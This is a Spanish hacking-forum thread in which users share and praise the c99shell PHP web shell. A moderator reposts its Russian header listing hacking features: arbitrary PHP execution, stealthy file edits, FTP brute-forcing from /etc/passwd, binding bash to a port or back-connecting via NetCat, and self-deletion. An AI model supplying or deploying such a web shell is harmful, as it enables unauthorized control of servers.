  1015.    ?></select><hr size="1" noshade>Please, select database<hr size="1" noshade><input type="submit" value="Go"></form>
« Última modificación: Abril 28, 2013, 05:15:13 pm por 2Fac3R »

Desconectado 2Fac3R

« Respuesta #1 en: Abril 28, 2013, 05:18:53 pm »
Te modifiqué el post, estaba muy largo el código y daba problemas dentro del tag de "code", así que borré una pequeña parte comentada y quedó bien.

Acá dejo la parte que borré por si a alguien le interesa:

Código: PHP
  1. /*
  2. ******************************************************************************************************
  3. *
  4. *                                       c99shell.php v.1.0 pre-release build #13
  5. *                                                       Freeware license.
  6. *                                                               © CCTeaM.
  7. *  c99shell - файл-менеджер через www-броузер, "заточеный" для взлома.
  8. *  Вы можете бесплатно скачать последнюю версию на домашней страничке продукта:
  9.    http://ccteam.ru/releases/c99shell
  10. *
  11. *  WEB: http://ccteam.ru
  12. *  ICQ UIN #: 656555
  13. *
  14. *  Особенности:
  15. *  + управление локальными и удаленными (ftp, samba) файлами/папками, сортировка
  16. *    закачивание скачивание файлов и папок
  17. *    (предворительно упаковывается/распаковывается через tar)
  18. *    продвинутый поиск (возможен внутри файлов)
  19. *    modify-time и access-time у файлов не меняются при редактировании (для откл. см $filestealth)
  20. *  + выполнение произвольного PHP-кода
  21. *  + кодировщик данных через md5, unix-md5, sha1, crc32, base64
  22. *  + быстрый локальный анализ безопасности ОС
  23. *  + быстрое ftp-сканирование на связки login;login из /etc/passwd (обычно дает доступ к 1/100 аккаунтов)
  24. *    постраничный вывод, сортировка, групповые операции над БД/таблицами, управление процессами SQL)
  25. *  + скрипт "любит" include: автоматически ищет переменные с дескрипторами и вставляет их в ссылки (опциально)
  26.      также можно изменить $surl (базовая ссылка) как через конфигурацию (принудительно) так и через cookie "c99sh_surl",
  27.      идет авто-запись значения $set_surl в cookie "set_surl"
  28. *  + возможность "забиндить" /bin/bash на определенный порт с произвольным паролем,
  29. *    или сделать back connect (производится тестирование соеденения, и выводятся параметры для запуска NetCat).
  30. *  + возможность быстрого само-удаления скрипта
  31. *  + автоматизированая отправка сообщений о недоработках и пожеланиях автору (через mail())
  32. *
  33. *       Приведен далеко не полный список возможностей.
  34. *
  35. *   Ожидаемые изменения:
  36. *  ~ Развитие sql-менеджера
  37. *  ~ Добавление недостающих расширений файлов
  38. *
  39. *  ~-~ Пишите обо всех найденых недоработках, желаемых изменениях и доработках (даже о самых незначительных!)
  40.        в ICQ UIN #656555 либо через раздел "feedback", будут рассмотрены все предложения и пожелания.
  41. *
  42. *  Last modify: 29.07.2005
  43.  

Buen aporte!
Zalu2
« Última modificación: Marzo 27, 2014, 05:32:45 pm por Expermicid »
Escuela de Hackers & Programación.
http://ihackndev.blogspot.com/

Desconectado D4rkC0d3r

« Respuesta #2 en: Abril 28, 2013, 08:08:29 pm »
Gracias por el aporte!!!  ;D

Saludos!

D4rkC0d3r

 
